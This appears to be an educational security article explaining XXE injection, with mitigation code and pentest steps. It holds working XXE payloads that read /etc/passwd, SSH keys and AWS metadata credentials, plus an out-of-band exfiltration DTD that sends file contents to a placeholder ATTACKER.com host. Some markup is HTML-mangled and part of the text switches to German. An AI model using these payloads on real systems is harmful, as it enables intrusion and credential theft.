XXE - XML External Entity Injection - Definition & Explanation

XXE is one of the most insidious web vulnerabilities because it often occurs in hidden XML processing paths—in upload endpoints, SOAP services, SVG files, Office documents, and REST APIs with XML support. An attacker who finds XXE in an internal system can use it to read cloud credentials from the metadata service and compromise the entire AWS infrastructure.

XXE Basic Principle

Normal XML Entities

<!DOCTYPE note [
  <!ENTITY name "Alice">
]&gt;
<note>
  <to>&amp;name;</to>
</note>

&name; expands to "Alice"—completely harmless.

External Entity – The Problem

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]&gt;
<foo>&amp;xxe;</foo>

The parser reads /etc/passwd and inserts the content. The server returns the /etc/passwd content in the response.

Why Is This Possible?

The XML standard allows external entities
Many XML parsers enable external entities by default
Java SAX parser: insecure by default prior to Java 8
libxml2: external entity loading enabled by default
.NET XmlDocument: insecure up to .NET 4.5.2

XXE Payloads

File Reading (Linux)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]&gt;
<stockCheck>
  <productId>&amp;xxe;</productId>
  
  <storeId>1</storeId>
</stockCheck>

Typical Target Files:

Path	Content
`file:///etc/passwd`	User accounts
`file:///etc/shadow`	Password hashes (if accessible!)
`file:///etc/hosts`	Internal hostnames
`file:///proc/self/environ`	Environment variables (API keys!)
`file:///home/user/.ssh/id_rsa`	SSH private keys
`file:///var/www/html/config.php`	Database passwords

File Reading (Windows)

file:///C:/Windows/system32/drivers/etc/hosts
file:///C:/inetpub/wwwroot/web.config - IIS configuration
file:///C:/Users/Administrator/.ssh/id_rsa

AWS Credentials via XXE + SSRF

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role">
]&gt;
<foo>&amp;xxe;</foo>

Reads temporary AWS credentials from the EC2 Instance Metadata Service (IMDS). A critical finding in AWS environments, as the entire account can be compromised.

If no direct response is received, the attacker can still exfiltrate data.

Proof of XXE Vulnerability:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://ATTACKER-SERVER.com/test?data=">
]&gt;
<foo>&amp;xxe;</foo>

The attacker’s server receives an HTTP request as proof.

External DTD on attacker’s server (evil.dtd):

<!--ENTITY % file SYSTEM "file:///etc/passwd"-->
<!--ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER.com/?data=%file;'-->
&quot;&gt;
%eval;
%exfil;

Payload to target system:

<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://ATTACKER.com/evil.dtd">
xml%remote;
]&gt;
<foo>trigger</foo>

XXE via SVG Upload

SVG files are XML. Upload endpoints for "Upload Avatar" or "Thumbnail" are frequently affected:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]&gt;
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&amp;xxe;</text>
</svg>```

When the SVG is rendered, the hostname appears in the image.

### XXE via XLSX/DOCX Upload

Office documents are ZIP archives containing XML files. To manipulate them:

```bash
# 1. Unzip the original file:
unzip doc.docx -d doc/
# 2. Add XXE payload to [Content_Types].xml
# 3. Repack:
zip -r evil.docx doc/

XXE in SOAP Web Services

POST /soap/service HTTP/1.1
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]&gt;
<soap:Envelope xmlns:soap="...">
  <soap:Body>
    <getUser>
      <username>&amp;xxe;</username>
    </getUser>
  </soap:Body>
</soap:Envelope>

XXE Mitigation Measures

Configure the parser securely

Java (SAXParser, DocumentBuilder):

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

// Disable external entities:
factory.setFeature(&quot;http://apache.org/xml/features/disallow-doctype-decl&quot;, true);
// OR more granularly:
factory.setFeature(&quot;http://xml.org/sax/features/external-general-entities&quot;, false);
factory.setFeature(&quot;http://xml.org/sax/features/external-parameter-entities&quot;, false);
factory.setFeature(&quot;http://apache.org/xml/features/nonvalidating/load-external-dtd&quot;, false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();

Python (defusedxml) - recommended:

# DO NOT USE: lxml.etree.parse(file) - XXE-vulnerable!
# GOOD: Use defusedxml:
import defusedxml.ElementTree as ET
tree = ET.parse(file)  # Automatically blocks: XXE, Billion Laughs, DTD

Python (lxml) - explicitly configured:

from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False
)
tree = etree.parse(file, parser)

PHP:

// libxml_disable_entity_loader() - deprecated in PHP 8.0, now default!
// PHP 7.x:
libxml_disable_entity_loader(true);

// PHP 8.0+: external entities are disabled by default!
// Nevertheless: use the LIBXML_NONET flag:
$dom = new DOMDocument();
$dom-&gt;loadXML($xml, LIBXML_NONET | LIBXML_DTDLOAD);

.NET (XmlDocument, XmlReader):

// Insecure (&lt; .NET 4.5.2):
XmlDocument doc = new XmlDocument();
doc.Load(xmlInput);  // Vulnerable to XXE!

// Safe:
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null;  // Disable external resolvers
doc.Load(xmlInput);

// XmlReader (safer by default since .NET 4.5.2):
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using XmlReader reader = XmlReader.Create(input, settings);

NGINX / WAF Level:

SecRule REQUEST_BODY &quot;@rx SYSTEM\s*[\&quot;&#x27;]&quot; \
  &quot;id:1001,phase:2,t:none,deny,status:400,msg:&#x27;XXE Attempt&#x27;&quot;

SecRule REQUEST_BODY &quot;@rx<!--ENTITY" \
  "id:1002,phase:2,t:none,deny,status:400,msg:'XXE Entity Declaration'"

Design-Empfehlungen

JSON statt XML wo möglich (JSON hat kein Entity-Problem)
SVG-Upload: serverseitig in PNG/JPG konvertieren (Pillow/ImageMagick)
Office-Dokument-Parser: spezialisierte Bibliotheken (Apache POI, python-docx) statt direktes XML-Parsing
Input-Validation: Content-Type + Magic Bytes prüfen

XXE-Testing

Pentest-Vorgehen

Schritt 1 - XML-Input-Punkte identifizieren:

Alle Endpunkte mit Content-Type: application/xml / text/xml
Upload-Endpunkte (SVG, DOCX, XLSX, XML)
SOAP-Endpoints
JSON-APIs mit optionalem XML-Support (Accept: application/xml)

Schritt 2 - Basis-Payload testen:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.net/test"-->
]&gt;
<xml>&amp;xxe;</xml>

Does a DNS lookup or HTTP request arrive at the Collaborator?

Step 3 - Attempt file reading:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">
]&gt;
<xml>&amp;xxe;</xml>

Is the hostname visible in the response?

Step 4 - Check for blind XXE:

If no direct output appears, attempt OOB exfiltration. interactsh is suitable as a callback server.

Step 5 - Automated Tools:

nuclei -t nuclei-templates/vulnerabilities/xxe/ -u https://target.com

Burp Pro: automatic XXE detection in Active Scan with Burp Collaborator as OOB proof.